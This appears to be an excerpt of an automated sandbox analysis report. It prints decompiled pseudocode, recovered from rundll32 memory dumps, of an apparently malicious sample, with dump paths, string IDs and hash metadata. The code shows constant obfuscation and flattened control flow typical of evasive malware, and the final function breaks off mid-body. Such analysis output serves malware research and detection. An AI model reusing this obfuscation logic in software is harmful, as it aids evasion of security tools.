                                                                                                                      				_v8 = _v8 & 0x00000000;
                                                                                                                      				_t175 =  &(( &_v80)[4]);
                                                                                                                      				_v4 = _v4 & 0x00000000;
                                                                                                                      				_v16 = 0x6f933c;
                                                                                                                      				_t169 = 0;
                                                                                                                      				_v12 = 0xacafca;
                                                                                                                      				_t157 = 0x2c6486;
                                                                                                                      				_v40 = 0xf6c939;
                                                                                                                      				_t170 = 0xb;
                                                                                                                      				_v40 = _v40 / _t170;
                                                                                                                      				_v40 = _v40 ^ 0x00166f60;
                                                                                                                      				_v36 = 0x3062f8;
                                                                                                                      				_v36 = _v36 << 9;
                                                                                                                      				_v36 = _v36 ^ 0x60c5f010;
                                                                                                                      				_v56 = 0xc1f429;
                                                                                                                      				_v56 = _v56 << 9;
                                                                                                                      				_v56 = _v56 << 3;
                                                                                                                      				_v56 = _v56 ^ 0x5f429000;
                                                                                                                      				_v80 = 0x6a6c05;
                                                                                                                      				_v80 = _v80 | 0xf56e7669;
                                                                                                                      				_t171 = 0x32;
                                                                                                                      				_v80 = _v80 * 0x6f;
                                                                                                                      				_v80 = _v80 + 0xffff851e;
                                                                                                                      				_v80 = _v80 ^ 0x6ae37c08;
                                                                                                                      				_v60 = 0x567c0c;
                                                                                                                      				_v60 = _v60 + 0xd503;
                                                                                                                      				_v60 = _v60 * 0x3a;
                                                                                                                      				_v60 = _v60 ^ 0x13c3775e;
                                                                                                                      				_v64 = 0x59a2ac;
                                                                                                                      				_v64 = _v64 | 0x5ac15ac1;
                                                                                                                      				_v64 = _v64 ^ 0x94d4ce27;
                                                                                                                      				_v64 = _v64 ^ 0xce05e559;
                                                                                                                      				_v44 = 0x50d454;
                                                                                                                      				_v44 = _v44 * 0x6a;
                                                                                                                      				_v44 = _v44 ^ 0x2175139d;
                                                                                                                      				_v48 = 0x5a75fb;
                                                                                                                      				_v48 = _v48 * 0x57;
                                                                                                                      				_v48 = _v48 ^ 0x1eb14dac;
                                                                                                                      				_v24 = 0x99b258;
                                                                                                                      				_v24 = _v24 << 4;
                                                                                                                      				_v24 = _v24 ^ 0x099f4f84;
                                                                                                                      				_v76 = 0x853d43;
                                                                                                                      				_v76 = _v76 >> 1;
                                                                                                                      				_v76 = _v76 >> 0xe;
                                                                                                                      				_v76 = _v76 | 0x5f7f2022;
                                                                                                                      				_v76 = _v76 ^ 0x5f753756;
                                                                                                                      				_v28 = 0xded29;
                                                                                                                      				_v28 = _v28 | 0xc4be8170;
                                                                                                                      				_v28 = _v28 ^ 0xc4b8b15a;
                                                                                                                      				_v32 = 0x545bb5;
                                                                                                                      				_v32 = _v32 + 0xe4b1;
                                                                                                                      				_v32 = _v32 ^ 0x005c5734;
                                                                                                                      				_v68 = 0xaed47d;
                                                                                                                      				_v68 = _v68 << 0xf;
                                                                                                                      				_v68 = _v68 | 0x1d211fc5;
                                                                                                                      				_v68 = _v68 / _t171;
                                                                                                                      				_v68 = _v68 ^ 0x02801ca0;
                                                                                                                      				_v52 = 0x7d6e82;
                                                                                                                      				_v52 = _v52 >> 0x10;
                                                                                                                      				_v52 = _v52 * 0x56;
                                                                                                                      				_v52 = _v52 ^ 0x0007d38d;
                                                                                                                      				_v72 = 0xcd2745;
                                                                                                                      				_v72 = _v72 ^ 0xed8bacb0;
                                                                                                                      				_v72 = _v72 + 0xffffdf8c;
                                                                                                                      				_v72 = _v72 | 0xe372d41f;
                                                                                                                      				_v72 = _v72 ^ 0xef7557f2;
                                                                                                                      				_v20 = 0x88cfe7;
                                                                                                                      				_v20 = _v20 >> 0xe;
                                                                                                                      				_v20 = _v20 ^ 0x0008c4a6;
                                                                                                                      				_t172 = _v20;
                                                                                                                      				while(_t157 != 0x2c6486) {
                                                                                                                      					if(_t157 == 0x2a600e7) {
                                                                                                                      						E00184DAD(_v68, _v52, _t172, _v72, _v20);
                                                                                                                      					} else {
                                                                                                                      						if(_t157 == 0xbcc0c39) {
                                                                                                                      							_t153 = E0017EEB8(_v24, _v76, _t172,  *((intOrPtr*)(_t155 + 4)), _t157, _t155 + 4, _v28, _v32,  *_t155);
                                                                                                                      							_t175 =  &(_t175[7]);
                                                                                                                      							_t169 = _t153;
                                                                                                                      							_t157 = 0x2a600e7;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t157 != 0xd3b3a19) {
                                                                                                                      								L9:
                                                                                                                      								if(_t157 != 0xb00d47) {
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								_t154 = E0018E938(_v36, _v56, _v80, _v60, _v40, _t157, _v64, _v44, _t157, _v48, 0, _t173);
                                                                                                                      								_t172 = _t154;
                                                                                                                      								_t175 =  &(_t175[0xa]);
                                                                                                                      								if(_t154 != 0xffffffff) {
                                                                                                                      									_t157 = 0xbcc0c39;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t169;
                                                                                                                      				}
                                                                                                                      				_t157 = 0xd3b3a19;
                                                                                                                      				goto L9;
                                                                                                                      			}

































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$4W\$V7u_
                                                                                                                      • API String ID: 0-1304481894
                                                                                                                      • Opcode ID: 7d0e0d148a11cd35a0702ef9378e6d2ffe14927d1b48726e3f76aff6e6edbe8e
                                                                                                                      • Instruction ID: fd2e05af0fb6760be246e429f983f9e0b5ae69a924e4b7de2e28bef22bf2244b
                                                                                                                      • Opcode Fuzzy Hash: 7d0e0d148a11cd35a0702ef9378e6d2ffe14927d1b48726e3f76aff6e6edbe8e
                                                                                                                      • Instruction Fuzzy Hash: 7E712F710093409FC758DF61C54A91BBBF1FBC5B58F104A1DF2969A260D3B28A09CF97
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E001904DE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				void* _t114;
                                                                                                                      				void* _t125;
                                                                                                                      				void* _t128;
                                                                                                                      				signed int _t132;
                                                                                                                      				void* _t135;
                                                                                                                      				void* _t148;
                                                                                                                      				signed int* _t151;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t147 = _a8;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t114);
                                                                                                                      				_v60 = 0xcc4817;
                                                                                                                      				_t151 =  &(( &_v96)[5]);
                                                                                                                      				_v60 = _v60 << 8;
                                                                                                                      				_v60 = _v60 ^ 0xcc47e657;
                                                                                                                      				_t148 = 0;
                                                                                                                      				_v68 = 0xe0ed25;
                                                                                                                      				_t135 = 0xdcadf3a;
                                                                                                                      				_v68 = _v68 | 0xce8f6412;
                                                                                                                      				_v68 = _v68 ^ 0xf3afd128;
                                                                                                                      				_v68 = _v68 ^ 0x3d42c27e;
                                                                                                                      				_v72 = 0x9a5a35;
                                                                                                                      				_v72 = _v72 >> 7;
                                                                                                                      				_t132 = 0x47;
                                                                                                                      				_v72 = _v72 * 0x61;
                                                                                                                      				_v72 = _v72 ^ 0x007dafa6;
                                                                                                                      				_v76 = 0x100281;
                                                                                                                      				_v76 = _v76 + 0xffff4995;
                                                                                                                      				_v76 = _v76 ^ 0x3bbc9aa1;
                                                                                                                      				_v76 = _v76 ^ 0x3bbd0b56;
                                                                                                                      				_v84 = 0xc6f502;
                                                                                                                      				_v84 = _v84 / _t132;
                                                                                                                      				_v84 = _v84 >> 1;
                                                                                                                      				_v84 = _v84 | 0x31db5564;
                                                                                                                      				_v84 = _v84 ^ 0x31df2935;
                                                                                                                      				_v88 = 0xec4ee3;
                                                                                                                      				_t44 =  &_v88; // 0xec4ee3
                                                                                                                      				_v88 =  *_t44 * 0x67;
                                                                                                                      				_v88 = _v88 >> 3;
                                                                                                                      				_v88 = _v88 | 0x81ddbea1;
                                                                                                                      				_v88 = _v88 ^ 0x8bf24dda;
                                                                                                                      				_v92 = 0xa20219;
                                                                                                                      				_v92 = _v92 + 0x973c;
                                                                                                                      				_v92 = _v92 | 0xc6adcdd8;
                                                                                                                      				_v92 = _v92 << 0xa;
                                                                                                                      				_v92 = _v92 ^ 0xbf7a6030;
                                                                                                                      				_v96 = 0x474fb;
                                                                                                                      				_v96 = _v96 + 0x4e06;
                                                                                                                      				_v96 = _v96 * 0x4d;
                                                                                                                      				_v96 = _v96 ^ 0xb0fe0c99;
                                                                                                                      				_v96 = _v96 ^ 0xb19d06b7;
                                                                                                                      				_v52 = 0x7e1eaf;
                                                                                                                      				_v52 = _v52 ^ 0x3657a741;
                                                                                                                      				_v52 = _v52 ^ 0x362fc7d5;
                                                                                                                      				_v80 = 0x982156;
                                                                                                                      				_v80 = _v80 >> 1;
                                                                                                                      				_v80 = _v80 * 0x77;
                                                                                                                      				_v80 = _v80 * 0x51;
                                                                                                                      				_v80 = _v80 ^ 0x3002d3c9;
                                                                                                                      				_v56 = 0xfe8a73;
                                                                                                                      				_v56 = _v56 | 0x35e06d03;
                                                                                                                      				_v56 = _v56 ^ 0x35fae637;
                                                                                                                      				_v64 = 0x133817;
                                                                                                                      				_v64 = _v64 | 0xd744828f;
                                                                                                                      				_v64 = _v64 + 0x2427;
                                                                                                                      				_v64 = _v64 ^ 0xd75b1468;
                                                                                                                      				do {
                                                                                                                      					while(_t135 != 0x54f2717) {
                                                                                                                      						if(_t135 == 0x5ba048a) {
                                                                                                                      							_t128 = E0018B9B1(_v84, _v88, __eflags, _t147 + 0x34, _v92,  &_v48, _v96);
                                                                                                                      							_t151 =  &(_t151[4]);
                                                                                                                      							__eflags = _t128;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								_t135 = 0x54f2717;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t135 == 0xb11095c) {
                                                                                                                      								E001864C5(_v60, _v68, _v72, _v76, _a4,  &_v48);
                                                                                                                      								_t151 =  &(_t151[4]);
                                                                                                                      								_t135 = 0x5ba048a;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t135 != 0xdcadf3a) {
                                                                                                                      									goto L10;
                                                                                                                      								} else {
                                                                                                                      									_t135 = 0xb11095c;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L11;
                                                                                                                      					}
                                                                                                                      					_t125 = E0018B9B1(_v52, _v80, __eflags, _t147 + 0x10, _v56,  &_v48, _v64);
                                                                                                                      					_t151 =  &(_t151[4]);
                                                                                                                      					__eflags = _t125;
                                                                                                                      					_t148 =  !=  ? 1 : _t148;
                                                                                                                      					_t135 = 0xe1bb211;
                                                                                                                      					L10:
                                                                                                                      					__eflags = _t135 - 0xe1bb211;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				L11:
                                                                                                                      				return _t148;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %$'$$N
                                                                                                                      • API String ID: 0-2135679241
                                                                                                                      • Opcode ID: 97615591f5f084c9a38ef9eec9de6edeef0eef2f1fdc60eea6539c0a4db16790
                                                                                                                      • Instruction ID: dd57cdf6c9096fde1f00e45e4a413e21b316b96a56bfc6f5afe724e0a8566d93
                                                                                                                      • Opcode Fuzzy Hash: 97615591f5f084c9a38ef9eec9de6edeef0eef2f1fdc60eea6539c0a4db16790
                                                                                                                      • Instruction Fuzzy Hash: 135132B15083829FCB49CF21C58681BBBF4FBD8748F505A1DF5A696220D3B1DA598F82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0018026B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				void* _t108;
                                                                                                                      				void* _t117;
                                                                                                                      				void* _t124;
                                                                                                                      				void* _t126;
                                                                                                                      				void* _t141;
                                                                                                                      				signed int _t142;
                                                                                                                      				signed int _t143;
                                                                                                                      				signed int* _t146;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t140 = _a4;
                                                                                                                      				_t124 = __edx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t108);
                                                                                                                      				_v92 = 0x51c9e1;
                                                                                                                      				_t146 =  &(( &_v96)[5]);
                                                                                                                      				_v92 = _v92 << 4;
                                                                                                                      				_t141 = 0;
                                                                                                                      				_t126 = 0x4bb83f6;
                                                                                                                      				_t142 = 0x49;
                                                                                                                      				_v92 = _v92 * 0x6e;
                                                                                                                      				_v92 = _v92 + 0x829d;
                                                                                                                      				_v92 = _v92 ^ 0x32495c11;
                                                                                                                      				_v68 = 0x73c01f;
                                                                                                                      				_v68 = _v68 + 0x1dcd;
                                                                                                                      				_v68 = _v68 ^ 0x00720d8f;
                                                                                                                      				_v96 = 0xb49fc9;
                                                                                                                      				_v96 = _v96 + 0x43a3;
                                                                                                                      				_v96 = _v96 ^ 0x15acb626;
                                                                                                                      				_v96 = _v96 << 0x10;
                                                                                                                      				_v96 = _v96 ^ 0x554d7300;
                                                                                                                      				_v84 = 0x939dbf;
                                                                                                                      				_v84 = _v84 >> 0xf;
                                                                                                                      				_v84 = _v84 / _t142;
                                                                                                                      				_v84 = _v84 ^ 0x000cd20a;
                                                                                                                      				_v60 = 0xb12a06;
                                                                                                                      				_v60 = _v60 | 0x23fd9b15;
                                                                                                                      				_v60 = _v60 ^ 0x23fc0752;
                                                                                                                      				_v76 = 0x2839ff;
                                                                                                                      				_v76 = _v76 + 0xfffff40d;
                                                                                                                      				_v76 = _v76 << 4;
                                                                                                                      				_v76 = _v76 ^ 0x0280e51a;
                                                                                                                      				_v80 = 0xa0e526;
                                                                                                                      				_v80 = _v80 | 0xbc5e80d8;
                                                                                                                      				_v80 = _v80 >> 7;
                                                                                                                      				_v80 = _v80 ^ 0x017df397;
                                                                                                                      				_v64 = 0xa3347;
                                                                                                                      				_t143 = 0x14;
                                                                                                                      				_v64 = _v64 * 0x36;
                                                                                                                      				_v64 = _v64 ^ 0x02285917;
                                                                                                                      				_v88 = 0x8f496e;
                                                                                                                      				_v88 = _v88 + 0x138c;
                                                                                                                      				_v88 = _v88 + 0x9d7d;
                                                                                                                      				_v88 = _v88 / _t143;
                                                                                                                      				_v88 = _v88 ^ 0x000c7ae1;
                                                                                                                      				_v72 = 0x3c508e;
                                                                                                                      				_v72 = _v72 ^ 0xe86d4278;
                                                                                                                      				_v72 = _v72 | 0x3236ed5f;
                                                                                                                      				_v72 = _v72 ^ 0xfa734a26;
                                                                                                                      				_v52 = 0x119dd9;
                                                                                                                      				_v52 = _v52 ^ 0x40537751;
                                                                                                                      				_v52 = _v52 ^ 0x404ccff2;
                                                                                                                      				_v56 = 0x89ec9d;
                                                                                                                      				_v56 = _v56 ^ 0xd17cb195;
                                                                                                                      				_v56 = _v56 ^ 0xd1fa716b;
                                                                                                                      				do {
                                                                                                                      					while(_t126 != 0x360725a) {
                                                                                                                      						if(_t126 == 0x4bb83f6) {
                                                                                                                      							_t126 = 0x9f53cee;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t126 == 0x6abf560) {
                                                                                                                      								__eflags = E0018B9B1(_v88, _v72, __eflags, _t140 + 4, _v52,  &_v48, _v56);
                                                                                                                      								_t141 =  !=  ? 1 : _t141;
                                                                                                                      							} else {
                                                                                                                      								if(_t126 != 0x9f53cee) {
                                                                                                                      									goto L10;
                                                                                                                      								} else {
                                                                                                                      									E001864C5(_v92, _v68, _v96, _v84, _t124,  &_v48);
                                                                                                                      									_t146 =  &(_t146[4]);
                                                                                                                      									_t126 = 0x360725a;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L13:
                                                                                                                      						return _t141;
                                                                                                                      					}
                                                                                                                      					_t117 = E0017B09F(_v60, _v76,  &_v48, _v80, _t140, _v64);
                                                                                                                      					_t146 =  &(_t146[4]);
                                                                                                                      					__eflags = _t117;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t126 = 0x3e1d0be;
                                                                                                                      						goto L10;
                                                                                                                      					} else {
                                                                                                                      						_t126 = 0x6abf560;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L13;
                                                                                                                      					L10:
                                                                                                                      					__eflags = _t126 - 0x3e1d0be;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L13;
                                                                                                                      			}

























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: G3$QwS@$_62
                                                                                                                      • API String ID: 0-451131340
                                                                                                                      • Opcode ID: 3902cee3783e2c7279a12e7e0d5481830c8a8355854c33fa136e91049aa61468
                                                                                                                      • Instruction ID: 9cf2f650c024299180005c43bac5d7a41182d849922caf9ef992dae72b7951d5
                                                                                                                      • Opcode Fuzzy Hash: 3902cee3783e2c7279a12e7e0d5481830c8a8355854c33fa136e91049aa61468
                                                                                                                      • Instruction Fuzzy Hash: 8D5168711083489FD388DF20C58582FBBE5FBD8758F505A1DF696A6261D3B1DA48CB83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00183D41(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				char _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				void* _t102;
                                                                                                                      				void* _t110;
                                                                                                                      				void* _t115;
                                                                                                                      				void* _t117;
                                                                                                                      				void* _t119;
                                                                                                                      				void* _t132;
                                                                                                                      				signed int _t133;
                                                                                                                      				signed int* _t136;
                                                                                                                      
                                                                                                                      				_t131 = _a8;
                                                                                                                      				_t117 = __edx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t102);
                                                                                                                      				_v64 = 0x9e44de;
                                                                                                                      				_t136 =  &(( &_v100)[4]);
                                                                                                                      				_v64 = _v64 >> 6;
                                                                                                                      				_v64 = _v64 ^ 0x000cb772;
                                                                                                                      				_t132 = 0;
                                                                                                                      				_v84 = 0x342048;
                                                                                                                      				_t119 = 0x9e632dd;
                                                                                                                      				_v84 = _v84 << 2;
                                                                                                                      				_t133 = 0x77;
                                                                                                                      				_v84 = _v84 / _t133;
                                                                                                                      				_v84 = _v84 ^ 0x00050c4a;
                                                                                                                      				_v68 = 0xcb0a16;
                                                                                                                      				_v68 = _v68 * 0x2c;
                                                                                                                      				_v68 = _v68 ^ 0x22ee5bf9;
                                                                                                                      				_v88 = 0x6d370;
                                                                                                                      				_v88 = _v88 << 2;
                                                                                                                      				_v88 = _v88 + 0xffff4ba7;
                                                                                                                      				_v88 = _v88 ^ 0x0017e1fc;
                                                                                                                      				_v96 = 0xa9311c;
                                                                                                                      				_v96 = _v96 + 0x677e;
                                                                                                                      				_v96 = _v96 << 6;
                                                                                                                      				_v96 = _v96 >> 1;
                                                                                                                      				_v96 = _v96 ^ 0x1536caa9;
                                                                                                                      				_v92 = 0x3ec146;
                                                                                                                      				_v92 = _v92 >> 1;
                                                                                                                      				_v92 = _v92 << 4;
                                                                                                                      				_v92 = _v92 ^ 0x01fa5034;
                                                                                                                      				_v100 = 0xc8b468;
                                                                                                                      				_v100 = _v100 + 0xabff;
                                                                                                                      				_v100 = _v100 + 0x496c;
                                                                                                                      				_v100 = _v100 << 3;
                                                                                                                      				_v100 = _v100 ^ 0x064ce6e5;
                                                                                                                      				_v72 = 0x40c3e5;
                                                                                                                      				_v72 = _v72 + 0xe4b1;
                                                                                                                      				_v72 = _v72 ^ 0x00481562;
                                                                                                                      				_v76 = 0xf7b9fc;
                                                                                                                      				_v76 = _v76 ^ 0x04753abe;
                                                                                                                      				_v76 = _v76 >> 8;
                                                                                                                      				_v76 = _v76 ^ 0x00058483;
                                                                                                                      				_v56 = 0xab3e00;
                                                                                                                      				_v56 = _v56 * 0x42;
                                                                                                                      				_v56 = _v56 ^ 0x2c2f6e9b;
                                                                                                                      				_v80 = 0x8577d2;
                                                                                                                      				_v80 = _v80 | 0xb985653c;
                                                                                                                      				_v80 = _v80 << 0xe;
                                                                                                                      				_v80 = _v80 ^ 0x5dfa230b;
                                                                                                                      				_v60 = 0xdce2c4;
                                                                                                                      				_v60 = _v60 | 0x5395b845;
                                                                                                                      				_v60 = _v60 ^ 0x53d3ec0c;
                                                                                                                      				while(_t119 != 0x979dba8) {
                                                                                                                      					if(_t119 == 0x9e632dd) {
                                                                                                                      						_t119 = 0xa2b72cf;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						if(_t119 == 0xa2b72cf) {
                                                                                                                      							E001864C5(_v64, _v84, _v68, _v88, _t117,  &_v52);
                                                                                                                      							_t136 =  &(_t136[4]);
                                                                                                                      							_t119 = 0xe5d0333;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t119 != 0xe5d0333) {
                                                                                                                      								L10:
                                                                                                                      								__eflags = _t119 - 0xfc63b9d;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								_t115 = E0017B09F(_v96, _v92,  &_v52, _v100, _t131 + 0xc, _v72);
                                                                                                                      								_t136 =  &(_t136[4]);
                                                                                                                      								if(_t115 != 0) {
                                                                                                                      									_t119 = 0x979dba8;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t132;
                                                                                                                      				}
                                                                                                                      				_t110 = E0018B9B1(_v76, _v56, __eflags, _t131 + 0x10, _v80,  &_v52, _v60);
                                                                                                                      				_t136 =  &(_t136[4]);
                                                                                                                      				__eflags = _t110;
                                                                                                                      				_t132 =  !=  ? 1 : _t132;
                                                                                                                      				_t119 = 0xfc63b9d;
                                                                                                                      				goto L10;
                                                                                                                      			}

























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: H 4$lI$~g
                                                                                                                      • API String ID: 0-1574228674
                                                                                                                      • Opcode ID: 423323af2e26e23c72106b1dc1ca73f18f5a7f0c7bd7cdbd74780325d6629f41
                                                                                                                      • Instruction ID: e9eb0ecdabe4407b57b52dc9f887b07e078069dbc50f91f3a2ded4238de3248d
                                                                                                                      • Opcode Fuzzy Hash: 423323af2e26e23c72106b1dc1ca73f18f5a7f0c7bd7cdbd74780325d6629f41
                                                                                                                      • Instruction Fuzzy Hash: EE5134B15083419FC758DF25848981BBBF5FBD4B48F404A1DFAA696260D3B1CA09CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00176A1F(void* __ecx) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				void* _t133;
                                                                                                                      				void* _t137;
                                                                                                                      				signed int _t139;
                                                                                                                      				signed int _t140;
                                                                                                                      				signed int _t141;
                                                                                                                      				intOrPtr _t158;
                                                                                                                      				intOrPtr* _t159;
                                                                                                                      				intOrPtr* _t160;
                                                                                                                      				void* _t161;
                                                                                                                      
                                                                                                                      				_t158 =  *0x195c94; // 0x0
                                                                                                                      				_v8 = 0x584755;
                                                                                                                      				_t137 = __ecx;
                                                                                                                      				_t2 =  &_v8; // 0x584755
                                                                                                                      				_t159 = _t158 + 0x230;
                                                                                                                      				_t139 = 0x64;
                                                                                                                      				_v8 =  *_t2 * 0x67;
                                                                                                                      				_v8 = _v8 + 0xffff4b67;
                                                                                                                      				_v8 = _v8 ^ 0xe76daef6;
                                                                                                                      				_v8 = _v8 ^ 0xc4ee506c;
                                                                                                                      				_v28 = 0x9e8b87;
                                                                                                                      				_v28 = _v28 + 0x75d;
                                                                                                                      				_v28 = _v28 / _t139;
                                                                                                                      				_v28 = _v28 ^ 0x00079f8c;
                                                                                                                      				_v24 = 0xc311ab;
                                                                                                                      				_v24 = _v24 + 0xffffbeea;
                                                                                                                      				_v24 = _v24 | 0xf92f35a0;
                                                                                                                      				_v24 = _v24 ^ 0xf9e35170;
                                                                                                                      				_v44 = 0x977698;
                                                                                                                      				_v44 = _v44 + 0x51f5;
                                                                                                                      				_v44 = _v44 ^ 0x0096f96a;
                                                                                                                      				_v32 = 0xe7cab8;
                                                                                                                      				_v32 = _v32 | 0xaa1208f4;
                                                                                                                      				_t140 = 0x17;
                                                                                                                      				_v32 = _v32 / _t140;
                                                                                                                      				_v32 = _v32 ^ 0x076e046c;
                                                                                                                      				_v12 = 0x2eec3f;
                                                                                                                      				_v12 = _v12 + 0xffffb819;
                                                                                                                      				_v12 = _v12 + 0xffff37c9;
                                                                                                                      				_t141 = 0x68;
                                                                                                                      				_v12 = _v12 / _t141;
                                                                                                                      				_v12 = _v12 ^ 0x000eef91;
                                                                                                                      				_v56 = 0x530307;
                                                                                                                      				_v56 = _v56 | 0x0fbda9c8;
                                                                                                                      				_v56 = _v56 ^ 0x0ffdd502;
                                                                                                                      				_v52 = 0x5d35c5;
                                                                                                                      				_v52 = _v52 + 0xd27c;
                                                                                                                      				_v52 = _v52 ^ 0x0055f8de;
                                                                                                                      				_v48 = 0x6ef6d5;
                                                                                                                      				_v48 = _v48 >> 1;
                                                                                                                      				_v48 = _v48 ^ 0x0035703d;
                                                                                                                      				_v16 = 0x82f5d;
                                                                                                                      				_v16 = _v16 << 0xd;
                                                                                                                      				_v16 = _v16 + 0xa18d;
                                                                                                                      				_v16 = _v16 + 0xffffcd20;
